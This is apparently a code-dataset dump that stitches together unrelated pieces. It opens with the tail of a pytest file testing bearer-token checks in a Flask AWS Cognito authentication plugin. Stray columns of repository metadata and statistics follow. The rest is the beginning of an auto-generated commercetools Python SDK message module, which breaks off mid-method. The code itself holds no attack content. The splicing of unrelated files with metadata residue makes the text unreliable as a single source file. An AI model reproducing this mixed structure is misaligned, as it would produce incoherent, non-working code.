app, cognito_service_test_factory, token_service_test_factory, client, test_view
):
plugin = AWSCognitoAuthentication(
app,
_token_service_factory=token_service_test_factory,
_cognito_service_factory=cognito_service_test_factory,
)
app.route("/")(plugin.authentication_required(test_view))
res = client.get("/")
assert res.status_code == 401
assert res.json == {"message": "test"}
@pytest.mark.usefixtures("set_env")
def test_no_auth_bad_token(
app, cognito_service_test_factory, token_service_test_factory, client, test_view
):
plugin = AWSCognitoAuthentication(
app,
_token_service_factory=token_service_test_factory,
_cognito_service_factory=cognito_service_test_factory,
)
app.route("/")(plugin.authentication_required(test_view))
res = client.get("/", headers={"Authorization": "Bearer bad_token"})
assert res.status_code == 401
assert res.json == {"message": "test"}
@pytest.mark.usefixtures("set_env")
def test_auth(
app, cognito_service_test_factory, token_service_test_factory, client, test_view
):
plugin = AWSCognitoAuthentication(
app,
_token_service_factory=token_service_test_factory,
_cognito_service_factory=cognito_service_test_factory,
)
app.route("/")(plugin.authentication_required(test_view))
res = client.get("/", headers={"Authorization": "Bearer good_token"})
assert res.status_code == 200
assert res.json == {"data": 123}
| 36.594937
| 85
| 0.721896
| 333
| 2,891
| 5.810811
| 0.159159
| 0.113695
| 0.186047
| 0.129199
| 0.816021
| 0.801034
| 0.801034
| 0.801034
| 0.762791
| 0.714729
| 0
| 0.013208
| 0.18817
| 2,891
| 78
| 86
| 37.064103
| 0.811248
| 0
| 0
| 0.657143
| 0
| 0
| 0.062211
| 0.011376
| 0
| 0
| 0
| 0
| 0.171429
| 1
| 0.071429
| false
| 0
| 0.028571
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53529f7d068e33bbac53a47ded2518df8af2130f
| 236,317
|
py
|
Python
|
src/commercetools/platform/models/message.py
|
labd/commercetools-python-sdk
|
d8ec285f08d56ede2e4cad45c74833f5b609ab5c
|
[
"MIT"
] | 15
|
2018-11-02T14:35:52.000Z
|
2022-03-16T07:51:44.000Z
|
src/commercetools/platform/models/message.py
|
labd/commercetools-python-sdk
|
d8ec285f08d56ede2e4cad45c74833f5b609ab5c
|
[
"MIT"
] | 84
|
2018-11-02T12:50:32.000Z
|
2022-03-22T01:25:54.000Z
|
src/commercetools/platform/models/message.py
|
labd/commercetools-python-sdk
|
d8ec285f08d56ede2e4cad45c74833f5b609ab5c
|
[
"MIT"
] | 13
|
2019-01-03T09:16:50.000Z
|
2022-02-15T18:37:19.000Z
|
# This file is automatically generated by the rmf-codegen project.
#
# The Python code generator is maintained by Lab Digital. If you want to
# contribute to this project then please do not edit this file directly
# but send a pull request to the Lab Digital fork of rmf-codegen at
# https://github.com/labd/rmf-codegen
import datetime
import enum
import typing
from ._abstract import _BaseType
from .cart import DiscountCodeState, ProductPublishScope
from .common import BaseResource
from .order import OrderState, PaymentState, ReturnShipmentState, ShipmentState
from .payment import TransactionState
if typing.TYPE_CHECKING:
from .cart import (
DiscountCodeState,
DiscountedLineItemPriceForQuantity,
LineItem,
ProductPublishScope,
ShippingInfo,
ShippingRateInput,
TaxedItemPrice,
)
from .category import Category, CategoryReference
from .channel import ChannelReference
from .common import (
Address,
CreatedBy,
DiscountedPrice,
Image,
LastModifiedBy,
LocalizedString,
Money,
Reference,
)
from .customer import Customer, CustomerReference
from .customer_group import CustomerGroupReference
from .discount_code import DiscountCodeReference
from .inventory import InventoryEntry
from .order import (
Delivery,
DeliveryItem,
Order,
OrderState,
Parcel,
ParcelMeasurements,
PaymentState,
ReturnInfo,
ReturnShipmentState,
ShipmentState,
TrackingData,
)
from .order_edit import OrderEditApplied, OrderEditReference
from .payment import Payment, Transaction, TransactionState
from .product import ProductProjection, ProductVariant
from .review import Review
from .state import StateReference
from .store import StoreKeyReference
from .type import CustomFields
__all__ = [
"CategoryCreatedMessage",
"CategoryCreatedMessagePayload",
"CategorySlugChangedMessage",
"CategorySlugChangedMessagePayload",
"CustomLineItemStateTransitionMessage",
"CustomLineItemStateTransitionMessagePayload",
"CustomerAddressAddedMessage",
"CustomerAddressAddedMessagePayload",
"CustomerAddressChangedMessage",
"CustomerAddressChangedMessagePayload",
"CustomerAddressRemovedMessage",
"CustomerAddressRemovedMessagePayload",
"CustomerCompanyNameSetMessage",
"CustomerCompanyNameSetMessagePayload",
"CustomerCreatedMessage",
"CustomerCreatedMessagePayload",
"CustomerDateOfBirthSetMessage",
"CustomerDateOfBirthSetMessagePayload",
"CustomerEmailChangedMessage",
"CustomerEmailChangedMessagePayload",
"CustomerEmailVerifiedMessage",
"CustomerEmailVerifiedMessagePayload",
"CustomerGroupSetMessage",
"CustomerGroupSetMessagePayload",
"CustomerPasswordUpdatedMessage",
"CustomerPasswordUpdatedMessagePayload",
"DeliveryAddedMessage",
"DeliveryAddedMessagePayload",
"DeliveryAddressSetMessage",
"DeliveryAddressSetMessagePayload",
"DeliveryItemsUpdatedMessage",
"DeliveryItemsUpdatedMessagePayload",
"DeliveryRemovedMessage",
"DeliveryRemovedMessagePayload",
"InventoryEntryCreatedMessage",
"InventoryEntryCreatedMessagePayload",
"InventoryEntryDeletedMessage",
"InventoryEntryDeletedMessagePayload",
"InventoryEntryQuantitySetMessage",
"InventoryEntryQuantitySetMessagePayload",
"LineItemStateTransitionMessage",
"LineItemStateTransitionMessagePayload",
"Message",
"MessageConfiguration",
"MessageConfigurationDraft",
"MessagePagedQueryResponse",
"MessagePayload",
"OrderBillingAddressSetMessage",
"OrderBillingAddressSetMessagePayload",
"OrderCreatedMessage",
"OrderCreatedMessagePayload",
"OrderCustomLineItemDiscountSetMessage",
"OrderCustomLineItemDiscountSetMessagePayload",
"OrderCustomerEmailSetMessage",
"OrderCustomerEmailSetMessagePayload",
"OrderCustomerGroupSetMessage",
"OrderCustomerGroupSetMessagePayload",
"OrderCustomerSetMessage",
"OrderCustomerSetMessagePayload",
"OrderDeletedMessage",
"OrderDeletedMessagePayload",
"OrderDiscountCodeAddedMessage",
"OrderDiscountCodeAddedMessagePayload",
"OrderDiscountCodeRemovedMessage",
"OrderDiscountCodeRemovedMessagePayload",
"OrderDiscountCodeStateSetMessage",
"OrderDiscountCodeStateSetMessagePayload",
"OrderEditAppliedMessage",
"OrderEditAppliedMessagePayload",
"OrderImportedMessage",
"OrderImportedMessagePayload",
"OrderLineItemAddedMessage",
"OrderLineItemAddedMessagePayload",
"OrderLineItemDiscountSetMessage",
"OrderLineItemDiscountSetMessagePayload",
"OrderPaymentStateChangedMessage",
"OrderPaymentStateChangedMessagePayload",
"OrderReturnInfoAddedMessage",
"OrderReturnInfoAddedMessagePayload",
"OrderReturnShipmentStateChangedMessage",
"OrderReturnShipmentStateChangedMessagePayload",
"OrderShipmentStateChangedMessage",
"OrderShipmentStateChangedMessagePayload",
"OrderShippingAddressSetMessage",
"OrderShippingAddressSetMessagePayload",
"OrderShippingInfoSetMessage",
"OrderShippingInfoSetMessagePayload",
"OrderShippingRateInputSetMessage",
"OrderShippingRateInputSetMessagePayload",
"OrderStateChangedMessage",
"OrderStateChangedMessagePayload",
"OrderStateTransitionMessage",
"OrderStateTransitionMessagePayload",
"OrderStoreSetMessage",
"OrderStoreSetMessagePayload",
"ParcelAddedToDeliveryMessage",
"ParcelAddedToDeliveryMessagePayload",
"ParcelItemsUpdatedMessage",
"ParcelItemsUpdatedMessagePayload",
"ParcelMeasurementsUpdatedMessage",
"ParcelMeasurementsUpdatedMessagePayload",
"ParcelRemovedFromDeliveryMessage",
"ParcelRemovedFromDeliveryMessagePayload",
"ParcelTrackingDataUpdatedMessage",
"ParcelTrackingDataUpdatedMessagePayload",
"PaymentCreatedMessage",
"PaymentCreatedMessagePayload",
"PaymentInteractionAddedMessage",
"PaymentInteractionAddedMessagePayload",
"PaymentStatusInterfaceCodeSetMessage",
"PaymentStatusInterfaceCodeSetMessagePayload",
"PaymentStatusStateTransitionMessage",
"PaymentStatusStateTransitionMessagePayload",
"PaymentTransactionAddedMessage",
"PaymentTransactionAddedMessagePayload",
"PaymentTransactionStateChangedMessage",
"PaymentTransactionStateChangedMessagePayload",
"ProductAddedToCategoryMessage",
"ProductAddedToCategoryMessagePayload",
"ProductCreatedMessage",
"ProductCreatedMessagePayload",
"ProductDeletedMessage",
"ProductDeletedMessagePayload",
"ProductImageAddedMessage",
"ProductImageAddedMessagePayload",
"ProductPriceDiscountsSetMessage",
"ProductPriceDiscountsSetMessagePayload",
"ProductPriceDiscountsSetUpdatedPrice",
"ProductPriceExternalDiscountSetMessage",
"ProductPriceExternalDiscountSetMessagePayload",
"ProductPublishedMessage",
"ProductPublishedMessagePayload",
"ProductRemovedFromCategoryMessage",
"ProductRemovedFromCategoryMessagePayload",
"ProductRevertedStagedChangesMessage",
"ProductRevertedStagedChangesMessagePayload",
"ProductSlugChangedMessage",
"ProductSlugChangedMessagePayload",
"ProductStateTransitionMessage",
"ProductStateTransitionMessagePayload",
"ProductUnpublishedMessage",
"ProductUnpublishedMessagePayload",
"ProductVariantAddedMessage",
"ProductVariantAddedMessagePayload",
"ProductVariantDeletedMessage",
"ProductVariantDeletedMessagePayload",
"ReviewCreatedMessage",
"ReviewCreatedMessagePayload",
"ReviewRatingSetMessage",
"ReviewRatingSetMessagePayload",
"ReviewStateTransitionMessage",
"ReviewStateTransitionMessagePayload",
"ShoppingListStoreSetMessagePayload",
"UserProvidedIdentifiers",
]
class Message(BaseResource):
last_modified_by: typing.Optional["LastModifiedBy"]
created_by: typing.Optional["CreatedBy"]
sequence_number: int
resource: "Reference"
resource_version: int
type: str
resource_user_provided_identifiers: typing.Optional["UserProvidedIdentifiers"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
type: str,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None
):
self.last_modified_by = last_modified_by
self.created_by = created_by
self.sequence_number = sequence_number
self.resource = resource
self.resource_version = resource_version
self.type = type
self.resource_user_provided_identifiers = resource_user_provided_identifiers
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
)
@classmethod
def deserialize(cls, data: typing.Dict[str, typing.Any]) -> "Message":
if data["type"] == "CategoryCreated":
from ._schemas.message import CategoryCreatedMessageSchema
return CategoryCreatedMessageSchema().load(data)
if data["type"] == "CategorySlugChanged":
from ._schemas.message import CategorySlugChangedMessageSchema
return CategorySlugChangedMessageSchema().load(data)
if data["type"] == "CustomLineItemStateTransition":
from ._schemas.message import CustomLineItemStateTransitionMessageSchema
return CustomLineItemStateTransitionMessageSchema().load(data)
if data["type"] == "CustomerAddressAdded":
from ._schemas.message import CustomerAddressAddedMessageSchema
return CustomerAddressAddedMessageSchema().load(data)
if data["type"] == "CustomerAddressChanged":
from ._schemas.message import CustomerAddressChangedMessageSchema
return CustomerAddressChangedMessageSchema().load(data)
if data["type"] == "CustomerAddressRemoved":
from ._schemas.message import CustomerAddressRemovedMessageSchema
return CustomerAddressRemovedMessageSchema().load(data)
if data["type"] == "CustomerCompanyNameSet":
from ._schemas.message import CustomerCompanyNameSetMessageSchema
return CustomerCompanyNameSetMessageSchema().load(data)
if data["type"] == "CustomerCreated":
from ._schemas.message import CustomerCreatedMessageSchema
return CustomerCreatedMessageSchema().load(data)
if data["type"] == "CustomerDateOfBirthSet":
from ._schemas.message import CustomerDateOfBirthSetMessageSchema
return CustomerDateOfBirthSetMessageSchema().load(data)
if data["type"] == "CustomerEmailChanged":
from ._schemas.message import CustomerEmailChangedMessageSchema
return CustomerEmailChangedMessageSchema().load(data)
if data["type"] == "CustomerEmailVerified":
from ._schemas.message import CustomerEmailVerifiedMessageSchema
return CustomerEmailVerifiedMessageSchema().load(data)
if data["type"] == "CustomerGroupSet":
from ._schemas.message import CustomerGroupSetMessageSchema
return CustomerGroupSetMessageSchema().load(data)
if data["type"] == "CustomerPasswordUpdated":
from ._schemas.message import CustomerPasswordUpdatedMessageSchema
return CustomerPasswordUpdatedMessageSchema().load(data)
if data["type"] == "DeliveryAdded":
from ._schemas.message import DeliveryAddedMessageSchema
return DeliveryAddedMessageSchema().load(data)
if data["type"] == "DeliveryAddressSet":
from ._schemas.message import DeliveryAddressSetMessageSchema
return DeliveryAddressSetMessageSchema().load(data)
if data["type"] == "DeliveryItemsUpdated":
from ._schemas.message import DeliveryItemsUpdatedMessageSchema
return DeliveryItemsUpdatedMessageSchema().load(data)
if data["type"] == "DeliveryRemoved":
from ._schemas.message import DeliveryRemovedMessageSchema
return DeliveryRemovedMessageSchema().load(data)
if data["type"] == "InventoryEntryCreated":
from ._schemas.message import InventoryEntryCreatedMessageSchema
return InventoryEntryCreatedMessageSchema().load(data)
if data["type"] == "InventoryEntryDeleted":
from ._schemas.message import InventoryEntryDeletedMessageSchema
return InventoryEntryDeletedMessageSchema().load(data)
if data["type"] == "InventoryEntryQuantitySet":
from ._schemas.message import InventoryEntryQuantitySetMessageSchema
return InventoryEntryQuantitySetMessageSchema().load(data)
if data["type"] == "LineItemStateTransition":
from ._schemas.message import LineItemStateTransitionMessageSchema
return LineItemStateTransitionMessageSchema().load(data)
if data["type"] == "OrderBillingAddressSet":
from ._schemas.message import OrderBillingAddressSetMessageSchema
return OrderBillingAddressSetMessageSchema().load(data)
if data["type"] == "OrderCreated":
from ._schemas.message import OrderCreatedMessageSchema
return OrderCreatedMessageSchema().load(data)
if data["type"] == "OrderCustomLineItemDiscountSet":
from ._schemas.message import OrderCustomLineItemDiscountSetMessageSchema
return OrderCustomLineItemDiscountSetMessageSchema().load(data)
if data["type"] == "OrderCustomerEmailSet":
from ._schemas.message import OrderCustomerEmailSetMessageSchema
return OrderCustomerEmailSetMessageSchema().load(data)
if data["type"] == "OrderCustomerGroupSet":
from ._schemas.message import OrderCustomerGroupSetMessageSchema
return OrderCustomerGroupSetMessageSchema().load(data)
if data["type"] == "OrderCustomerSet":
from ._schemas.message import OrderCustomerSetMessageSchema
return OrderCustomerSetMessageSchema().load(data)
if data["type"] == "OrderDeleted":
from ._schemas.message import OrderDeletedMessageSchema
return OrderDeletedMessageSchema().load(data)
if data["type"] == "OrderDiscountCodeAdded":
from ._schemas.message import OrderDiscountCodeAddedMessageSchema
return OrderDiscountCodeAddedMessageSchema().load(data)
if data["type"] == "OrderDiscountCodeRemoved":
from ._schemas.message import OrderDiscountCodeRemovedMessageSchema
return OrderDiscountCodeRemovedMessageSchema().load(data)
if data["type"] == "OrderDiscountCodeStateSet":
from ._schemas.message import OrderDiscountCodeStateSetMessageSchema
return OrderDiscountCodeStateSetMessageSchema().load(data)
if data["type"] == "OrderEditApplied":
from ._schemas.message import OrderEditAppliedMessageSchema
return OrderEditAppliedMessageSchema().load(data)
if data["type"] == "OrderImported":
from ._schemas.message import OrderImportedMessageSchema
return OrderImportedMessageSchema().load(data)
if data["type"] == "OrderLineItemAdded":
from ._schemas.message import OrderLineItemAddedMessageSchema
return OrderLineItemAddedMessageSchema().load(data)
if data["type"] == "OrderLineItemDiscountSet":
from ._schemas.message import OrderLineItemDiscountSetMessageSchema
return OrderLineItemDiscountSetMessageSchema().load(data)
if data["type"] == "OrderPaymentStateChanged":
from ._schemas.message import OrderPaymentStateChangedMessageSchema
return OrderPaymentStateChangedMessageSchema().load(data)
if data["type"] == "ReturnInfoAdded":
from ._schemas.message import OrderReturnInfoAddedMessageSchema
return OrderReturnInfoAddedMessageSchema().load(data)
if data["type"] == "OrderReturnShipmentStateChanged":
from ._schemas.message import OrderReturnShipmentStateChangedMessageSchema
return OrderReturnShipmentStateChangedMessageSchema().load(data)
if data["type"] == "OrderShipmentStateChanged":
from ._schemas.message import OrderShipmentStateChangedMessageSchema
return OrderShipmentStateChangedMessageSchema().load(data)
if data["type"] == "OrderShippingAddressSet":
from ._schemas.message import OrderShippingAddressSetMessageSchema
return OrderShippingAddressSetMessageSchema().load(data)
if data["type"] == "OrderShippingInfoSet":
from ._schemas.message import OrderShippingInfoSetMessageSchema
return OrderShippingInfoSetMessageSchema().load(data)
if data["type"] == "OrderShippingRateInputSet":
from ._schemas.message import OrderShippingRateInputSetMessageSchema
return OrderShippingRateInputSetMessageSchema().load(data)
if data["type"] == "OrderStateChanged":
from ._schemas.message import OrderStateChangedMessageSchema
return OrderStateChangedMessageSchema().load(data)
if data["type"] == "OrderStateTransition":
from ._schemas.message import OrderStateTransitionMessageSchema
return OrderStateTransitionMessageSchema().load(data)
if data["type"] == "OrderStoreSet":
from ._schemas.message import OrderStoreSetMessageSchema
return OrderStoreSetMessageSchema().load(data)
if data["type"] == "ParcelAddedToDelivery":
from ._schemas.message import ParcelAddedToDeliveryMessageSchema
return ParcelAddedToDeliveryMessageSchema().load(data)
if data["type"] == "ParcelItemsUpdated":
from ._schemas.message import ParcelItemsUpdatedMessageSchema
return ParcelItemsUpdatedMessageSchema().load(data)
if data["type"] == "ParcelMeasurementsUpdated":
from ._schemas.message import ParcelMeasurementsUpdatedMessageSchema
return ParcelMeasurementsUpdatedMessageSchema().load(data)
if data["type"] == "ParcelRemovedFromDelivery":
from ._schemas.message import ParcelRemovedFromDeliveryMessageSchema
return ParcelRemovedFromDeliveryMessageSchema().load(data)
if data["type"] == "ParcelTrackingDataUpdated":
from ._schemas.message import ParcelTrackingDataUpdatedMessageSchema
return ParcelTrackingDataUpdatedMessageSchema().load(data)
if data["type"] == "PaymentCreated":
from ._schemas.message import PaymentCreatedMessageSchema
return PaymentCreatedMessageSchema().load(data)
if data["type"] == "PaymentInteractionAdded":
from ._schemas.message import PaymentInteractionAddedMessageSchema
return PaymentInteractionAddedMessageSchema().load(data)
if data["type"] == "PaymentStatusInterfaceCodeSet":
from ._schemas.message import PaymentStatusInterfaceCodeSetMessageSchema
return PaymentStatusInterfaceCodeSetMessageSchema().load(data)
if data["type"] == "PaymentStatusStateTransition":
from ._schemas.message import PaymentStatusStateTransitionMessageSchema
return PaymentStatusStateTransitionMessageSchema().load(data)
if data["type"] == "PaymentTransactionAdded":
from ._schemas.message import PaymentTransactionAddedMessageSchema
return PaymentTransactionAddedMessageSchema().load(data)
if data["type"] == "PaymentTransactionStateChanged":
from ._schemas.message import PaymentTransactionStateChangedMessageSchema
return PaymentTransactionStateChangedMessageSchema().load(data)
if data["type"] == "ProductAddedToCategory":
from ._schemas.message import ProductAddedToCategoryMessageSchema
return ProductAddedToCategoryMessageSchema().load(data)
if data["type"] == "ProductCreated":
from ._schemas.message import ProductCreatedMessageSchema
return ProductCreatedMessageSchema().load(data)
if data["type"] == "ProductDeleted":
from ._schemas.message import ProductDeletedMessageSchema
return ProductDeletedMessageSchema().load(data)
if data["type"] == "ProductImageAdded":
from ._schemas.message import ProductImageAddedMessageSchema
return ProductImageAddedMessageSchema().load(data)
if data["type"] == "ProductPriceDiscountsSet":
from ._schemas.message import ProductPriceDiscountsSetMessageSchema
return ProductPriceDiscountsSetMessageSchema().load(data)
if data["type"] == "ProductPriceExternalDiscountSet":
from ._schemas.message import ProductPriceExternalDiscountSetMessageSchema
return ProductPriceExternalDiscountSetMessageSchema().load(data)
if data["type"] == "ProductPublished":
from ._schemas.message import ProductPublishedMessageSchema
return ProductPublishedMessageSchema().load(data)
if data["type"] == "ProductRemovedFromCategory":
from ._schemas.message import ProductRemovedFromCategoryMessageSchema
return ProductRemovedFromCategoryMessageSchema().load(data)
if data["type"] == "ProductRevertedStagedChanges":
from ._schemas.message import ProductRevertedStagedChangesMessageSchema
return ProductRevertedStagedChangesMessageSchema().load(data)
if data["type"] == "ProductSlugChanged":
from ._schemas.message import ProductSlugChangedMessageSchema
return ProductSlugChangedMessageSchema().load(data)
if data["type"] == "ProductStateTransition":
from ._schemas.message import ProductStateTransitionMessageSchema
return ProductStateTransitionMessageSchema().load(data)
if data["type"] == "ProductUnpublished":
from ._schemas.message import ProductUnpublishedMessageSchema
return ProductUnpublishedMessageSchema().load(data)
if data["type"] == "ProductVariantAdded":
from ._schemas.message import ProductVariantAddedMessageSchema
return ProductVariantAddedMessageSchema().load(data)
if data["type"] == "ProductVariantDeleted":
from ._schemas.message import ProductVariantDeletedMessageSchema
return ProductVariantDeletedMessageSchema().load(data)
if data["type"] == "ReviewCreated":
from ._schemas.message import ReviewCreatedMessageSchema
return ReviewCreatedMessageSchema().load(data)
if data["type"] == "ReviewRatingSet":
from ._schemas.message import ReviewRatingSetMessageSchema
return ReviewRatingSetMessageSchema().load(data)
if data["type"] == "ReviewStateTransition":
from ._schemas.message import ReviewStateTransitionMessageSchema
return ReviewStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import MessageSchema
return MessageSchema().dump(self)
class CategoryCreatedMessage(Message):
category: "Category"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
category: "Category"
):
self.category = category
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CategoryCreated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategoryCreatedMessage":
from ._schemas.message import CategoryCreatedMessageSchema
return CategoryCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategoryCreatedMessageSchema
return CategoryCreatedMessageSchema().dump(self)
class CategorySlugChangedMessage(Message):
slug: "LocalizedString"
old_slug: typing.Optional["LocalizedString"]
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
slug: "LocalizedString",
old_slug: typing.Optional["LocalizedString"] = None
):
self.slug = slug
self.old_slug = old_slug
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CategorySlugChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CategorySlugChangedMessage":
from ._schemas.message import CategorySlugChangedMessageSchema
return CategorySlugChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CategorySlugChangedMessageSchema
return CategorySlugChangedMessageSchema().dump(self)
class CustomLineItemStateTransitionMessage(Message):
custom_line_item_id: str
transition_date: datetime.datetime
quantity: int
from_state: "StateReference"
to_state: "StateReference"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
custom_line_item_id: str,
transition_date: datetime.datetime,
quantity: int,
from_state: "StateReference",
to_state: "StateReference"
):
self.custom_line_item_id = custom_line_item_id
self.transition_date = transition_date
self.quantity = quantity
self.from_state = from_state
self.to_state = to_state
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomLineItemStateTransition",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomLineItemStateTransitionMessage":
from ._schemas.message import CustomLineItemStateTransitionMessageSchema
return CustomLineItemStateTransitionMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomLineItemStateTransitionMessageSchema
return CustomLineItemStateTransitionMessageSchema().dump(self)
class CustomerAddressAddedMessage(Message):
address: "Address"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: "Address"
):
self.address = address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerAddressAdded",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressAddedMessage":
from ._schemas.message import CustomerAddressAddedMessageSchema
return CustomerAddressAddedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressAddedMessageSchema
return CustomerAddressAddedMessageSchema().dump(self)
class CustomerAddressChangedMessage(Message):
address: "Address"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: "Address"
):
self.address = address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerAddressChanged",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressChangedMessage":
from ._schemas.message import CustomerAddressChangedMessageSchema
return CustomerAddressChangedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressChangedMessageSchema
return CustomerAddressChangedMessageSchema().dump(self)
class CustomerAddressRemovedMessage(Message):
address: "Address"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
address: "Address"
):
self.address = address
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerAddressRemoved",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerAddressRemovedMessage":
from ._schemas.message import CustomerAddressRemovedMessageSchema
return CustomerAddressRemovedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerAddressRemovedMessageSchema
return CustomerAddressRemovedMessageSchema().dump(self)
class CustomerCompanyNameSetMessage(Message):
company_name: str
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
company_name: str
):
self.company_name = company_name
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerCompanyNameSet",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCompanyNameSetMessage":
from ._schemas.message import CustomerCompanyNameSetMessageSchema
return CustomerCompanyNameSetMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCompanyNameSetMessageSchema
return CustomerCompanyNameSetMessageSchema().dump(self)
class CustomerCreatedMessage(Message):
customer: "Customer"
def __init__(
self,
*,
id: str,
version: int,
created_at: datetime.datetime,
last_modified_at: datetime.datetime,
last_modified_by: typing.Optional["LastModifiedBy"] = None,
created_by: typing.Optional["CreatedBy"] = None,
sequence_number: int,
resource: "Reference",
resource_version: int,
resource_user_provided_identifiers: typing.Optional[
"UserProvidedIdentifiers"
] = None,
customer: "Customer"
):
self.customer = customer
super().__init__(
id=id,
version=version,
created_at=created_at,
last_modified_at=last_modified_at,
last_modified_by=last_modified_by,
created_by=created_by,
sequence_number=sequence_number,
resource=resource,
resource_version=resource_version,
resource_user_provided_identifiers=resource_user_provided_identifiers,
type="CustomerCreated",
)
@classmethod
def deserialize(
cls, data: typing.Dict[str, typing.Any]
) -> "CustomerCreatedMessage":
from ._schemas.message import CustomerCreatedMessageSchema
return CustomerCreatedMessageSchema().load(data)
def serialize(self) -> typing.Dict[str, typing.Any]:
from ._schemas.message import CustomerCreatedMessageSchema
